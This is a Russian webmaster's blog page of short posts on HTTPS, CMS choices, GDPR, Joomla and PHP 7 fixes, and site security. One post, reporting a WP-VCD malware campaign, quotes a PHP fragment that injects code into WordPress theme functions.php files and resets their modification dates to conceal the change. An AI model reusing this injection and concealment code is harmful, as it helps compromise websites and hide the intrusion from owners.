БЛОГ


Как-то один знакомый спросил: "У меня VDS, перевожу сайты на HTTPS, сертификат выдают на три месяца, продлевать кучу сертификатов каждые три месяца как-то лениво". Тогда я не знал, что ему ответить.

Прошло пару месяцев, еще один знакомый спросил: "Есть хостинг, давно сижу, хостер предлагает только платный сертификат, а проект, по сути, социальный, заработка нет и не предвидится. Да сам проект создан только для расходов и держится на волонтерах". К слову, Таймвеб предлагает бесплатный сертификат, но подобные решения предлагают не все хостеры.

И, конечно, лирическое отступление: Google не то чтобы обещает, а уже реально понижает рейтинг сайтов без шифрования. А поскольку мобильный трафик в РФ недавно обогнал широкополосный…

В общем, тем, кто пользуется телефоном на Андроид, известно, что по умолчанию установлен поиск от Google, и менять настройк, за редким исключением, никто не собирается.

Если совсем коротко – с наступлением эры мобильного интернета важность формирования целевого трафика в Google становятся больше, чем результаты, занимаемые сайтом в других поисковых системах, вне зависимости от личных предпочтений владельца ресурса.

Опубликовано в БЛОГ

Тенденция, однако. Разработчики клубных шаблонов начинают создавать собственные CMS, примерно полгода назад я писал о редакторе Publii от студии Gavickpro, Rockettheme несколько лет продвигает собственную разработку Grav, Pagekit, о котором сегодня пойдет речь недавно вышел из альфа версии и «оброс» расширениями и шаблонами.

CMS позиционируется разработчиком, как очень простая в освоении система. Делается акцент на ее легкости и скорости работы, и по заверениям студии, сайт на этой системе может легко выдерживать большое количество посетителей, не создавая большой нагрузки на хостинг.

Для тех, кому интересны подробности, CMS построена на Vue.js, компоненте Symfony и других, не менее известных пакетах - Composer, Doctrine, UIkit, jQuery, Gulp, Webpack и так далее.

Опубликовано в БЛОГ

С мая этого года в Европе вводятся новые правила обработки персональных данных.

О самих правилах распространяться не имеет смысла, о них и так много было сказано.

Остановимся на основных требованиях для вебмастера:

Любой зарегистрировшийся посетитель должен иметь возможность удалить свой аккаунт вместе со всеми данными.

Нельзя собирать данные сверх того, что нужно. Поясню: если у вас интернет-магазин, не стоит требовать данные, сверх тех, которые нужны для доставки товара. Как, например, возраст, пол и так далее.

Посетитель должен иметь возможность исправить свои регистрационные данные.

На мой взгляд, наиболее оптимальным решением будет сделать вход через Open ID, в  этом случае вы также снимаете с себя ответственность за хранение данных, что тоже особо обговаривается в новом регламенте.  

Полный текст можно прочитать тут.

Опубликовано в БЛОГ

При обновлении  версии Joomla! 3.8 и выше, на сайтах использующих шаблоны студии Shape5 отмечены случаи пропадания меню.

Разработчик фрамеворка Vertex (ошибка возникает из-за устаревшего плагина)  предлагает два варианта решения:

- установить компонент обновления Vertex Updater и обновить фрамеворк через панель администратора.

Опубликовано в БЛОГ

Сайты ломают, такое случается, причины разные, основные, это несвоевременное обновление расширений и кража паролей с компьютера администратора.


Остановимся немного подробнее на кражах паролей, в первом случае это может быть банальный вирус на компьютере, во втором, сохранённые в браузере пароли. Сохранять пароли конечно удобно, не нужно вводить при каждом входе в панель управления, особенно если нужно вносить материалы по нескольку раз в день.

В январе 2018 года специалистами различных компаний было зафиксировано несколько нестандартных подходов к краже учетных данных. Например, на стороннем, взломанном сайте размещается JS, посетителю, просматривающему сайт, подгружается скрипт, который просматривает сохранённые адреса и пароли от наиболее популярных CMS (/admin, /wp-admin, /administrator).

Также замечены кейлогеры распространяемые через поддельные домены Cloudflare, которые через JS также похищают пароли от панелей управления сайтами и хостингом.

Не так давно ко мне обратился заказчик с повторным заражением сайтов,  чему я был немало удивлен, поскольку считал, что закрыл все «дыры».

Опубликовано в БЛОГ

Включение PHP 7 заметно ускоряет работу сайта, но при переходе на седьмую версию некоторые шаблоны работают с ошибками.  Разработчики клубных шаблонов, как правило, выкладывают решения, как перевести шаблоны и расширения на новую платформу.
В этой заметке о решениях от студии Smartaddons.

Google Map

Ошибка:
Plugin_googleMaps имеет устаревшую конструкцию в /plugins/system/ytshortcodes/includes/libs/googlemap/googleMaps.lib.php в строке 385

Решение:
Открыть : /plugins/system/ytshortcodes/includes/libs/googlemap/googleMaps.lib.php
Найти: function Plugin_googleMaps
Заменить на: function __construct

Опубликовано в БЛОГ

В данном материале будет показан способ альтернативного обновления Magento , статья переводная.

Для популярного движка электронной коммерции Magento 28 сентября 2017 года был выпущен патч 10415 SUPEE 1.9.3.7 для решения нескольких критических проблем безопасности, таких как удаленное выполнение произвольного кода, межсайтовый скриптинг и так далее.

До сих пор не все владельцы ресурсов  обновили свои сайты, основная причина – использование SSL для установки обновлений, что и является основным препятствием для обновления.

Компания Magecomp предлагает альтернативный способ наложения патчей и рекомендует как можно скорее установить их, чтобы защитить Magento от возможных угроз безопасности.

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ

Сколько копий сломано на просторах сети в спорах о преимуществах этих CMS. К слову, споры идут с самого основания этих платформ, и только несколько раз мне встретились серьезные исследования, где автор провел множество тестов и доказывал свою позицию с цифрами в руках.

Данный материал не несет цели начать новые «холивары», а просто показать разницу этих систем. Никому же приходит в голову сравнивать, что лучше, зимняя обувь или летние шлепанцы. И даже если задать такой вопрос, - что лучше? То, как правило, последует уточнение – зимой или летом?

Точно так же и с этими CMS, при выборе нужно исходить из задачи, а не мыслить критериями нравиться-не нравится. Никому же не приходит в голову ходить летом на пляже в зимних кроссовках.

Опубликовано в БЛОГ

Часто требуется простой и легкий в освоении магазин. Как показывает практика, большинству площадок электронной коммерции не требуется огромное количество возможностей,   которые «из коробки» предлагают такие монстры, как Magento.

Обычно не  требуется пересчет стоимости товара в зависимости от курса валюты, веса и оператора доставки. Такие функции, как купоны на скидку, счет-фактура тоже не всегда востребованы. Если в будущем потребуется расширение функций, всегда можно обновиться до версии PRO, стоимость которой составляет всего 39 $

К тому же магазин построен на стандартных материалах Joomla, а значит, освоение не займет много времени.

Опубликовано в БЛОГ
Страница 1 из 2